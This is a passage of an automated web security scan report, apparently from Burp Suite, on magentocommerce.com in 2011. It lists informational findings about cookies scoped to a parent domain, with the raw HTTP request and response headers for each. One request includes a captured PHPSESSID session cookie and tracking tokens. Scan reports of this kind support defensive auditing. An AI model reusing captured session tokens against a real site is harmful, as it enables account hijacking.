The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bug-tracking HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176426; expires=Sat, 11-Aug-2012 15:13:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fbug-tracking%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:46 GMT
Content-Length: 34213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.14. http://www.magentocommerce.com/casestudies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /casestudies

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /casestudies HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176318; expires=Sat, 11-Aug-2012 15:11:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fcasestudies%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:58 GMT
Content-Length: 52582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.15. http://www.magentocommerce.com/company/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175799; expires=Sat, 11-Aug-2012 15:03:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcompany%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:19 GMT
Content-Length: 45865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.16. http://www.magentocommerce.com/company/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/careers

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/careers HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175820; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fcareers%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:41 GMT
Content-Length: 37178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.17. http://www.magentocommerce.com/company/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/contact-us HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175829; expires=Sat, 11-Aug-2012 15:03:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:49 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.18. http://www.magentocommerce.com/company/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/contact-us/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170931; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A4%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.7.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.19. http://www.magentocommerce.com/company/contact-us/thank_you  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/thank_you

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/contact-us/thank_you HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175794; expires=Sat, 11-Aug-2012 15:03:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcompany%2Fcontact-us%2Fthank_you%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:14 GMT
Content-Length: 32829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.20. http://www.magentocommerce.com/company/events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/events HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175835; expires=Sat, 11-Aug-2012 15:03:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:55 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.21. http://www.magentocommerce.com/company/events/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/events/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175850; expires=Sat, 11-Aug-2012 15:04:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:11 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.22. http://www.magentocommerce.com/company/inthepress  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/inthepress HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175806; expires=Sat, 11-Aug-2012 15:03:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:26 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.23. http://www.magentocommerce.com/company/inthepress/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/inthepress/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175861; expires=Sat, 11-Aug-2012 15:04:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.24. http://www.magentocommerce.com/company/jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/jobs/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/jobs/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175889; expires=Sat, 11-Aug-2012 15:04:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fcompany%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 133751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.25. http://www.magentocommerce.com/company/leadership  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/leadership HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175804; expires=Sat, 11-Aug-2012 15:03:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:24 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.26. http://www.magentocommerce.com/company/leadership/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/leadership/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175837; expires=Sat, 11-Aug-2012 15:03:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:57 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.27. http://www.magentocommerce.com/company/media  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/media HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:53 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.28. http://www.magentocommerce.com/company/media/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/media/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175868; expires=Sat, 11-Aug-2012 15:04:28 GMT; path=/; domain=magentocommerce.com
